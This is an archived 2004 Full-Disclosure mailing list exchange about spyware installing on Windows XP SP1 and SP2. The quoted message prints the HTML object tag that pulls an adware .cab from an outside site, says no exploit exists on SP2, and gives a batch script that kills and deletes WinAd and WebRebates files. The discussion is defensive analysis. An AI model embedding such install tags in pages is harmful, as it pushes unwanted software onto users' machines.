| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: ACastigliola at unumprovident.com (Castigliola, Angelo) Subject: Spyware installs ... XP SP2 box Thank you for the test Raize. I appreciate your time. >One must assume that you are installing these "theme packs" via some BHO (Browser Helper Object) that you >installed previously or put the site on the "Always trust content from this provider". Perhaps someone >else can explain where I am missing the exploit, because a quick glance over seems to indicate there is >none for XP SP2. (I did not test this on SP1) I think you are right. It seems the only person that was not prompted for the install that was not running SP2 was the original author of this thread who said that it was a previously visited site. As far as users running SP1 there is no security warning that says an executable is about to be installed. There is no Microsoft Update that will prevent this from loading. Like most large organizations just jumping to SP2 is not an option. It needs go though rigorous testing to make sure it complies with all of our internal software. Angelo Castigliola III Operations Technical Analyst I UnumProvident IT Services 207.575.3820 -----Original Message----- From: full-disclosure-admin@...ts.netsys.com [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of raize Sent: Tuesday, October 05, 2004 9:29 AM To: full-disclosure@...ts.netsys.com Subject: Re: [Full-Disclosure] Spyware installs ... XP SP2 box The installed code is definitely: <object id="DDownload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0></object> However, there is no exploit here. I loaded this with a default honeypot image of XPSP2 with IE as an Admin and nothing else installed other than the drop down that asked me if I really wanted to trust this site for installing an executable. One must assume that you are installing these "theme packs" via some BHO (Browser Helper Object) that you installed previously or put the site on the "Always trust content from this provider". Perhaps someone else can explain where I am missing the exploit, because a quick glance over seems to indicate there is none for XP SP2. (I did not test this on SP1) Spybot and Ad-aware do not catch and kill WinRebates and WinAd spy/adware properly, but I have a batch command that will do it for you. Included is a .zip of each IP contacted along with full URL request and output. It also contains the contents of this email and the batch file with these commands: (You'll want to rename the .txt to .bat) -------------------------------------------- cd "C:\Program Files\Winad Client" taskkill /T /F /IM WinClt.exe taskkill /T /F /IM WinAd.exe erase WinClt.exe erase WinAd.exe cd .. cd Web_Rebates taskkill /T /F /IM WebRebates0.exe taskkill /T /F /IM WebRebates1.exe erase WebRebates0.exe erase WebRebates1.exe cd .. rd /Q /S "Winad Client" rd /Q /S "Web_Rebates" cd "C:\Windows\system32" taskkill /T /F /IM fjdria.exe taskkill /T /F /IM ezSP_Px.exe erase fjdria.exe erase ezSP_Px.exe
Powered by blists - more mailing lists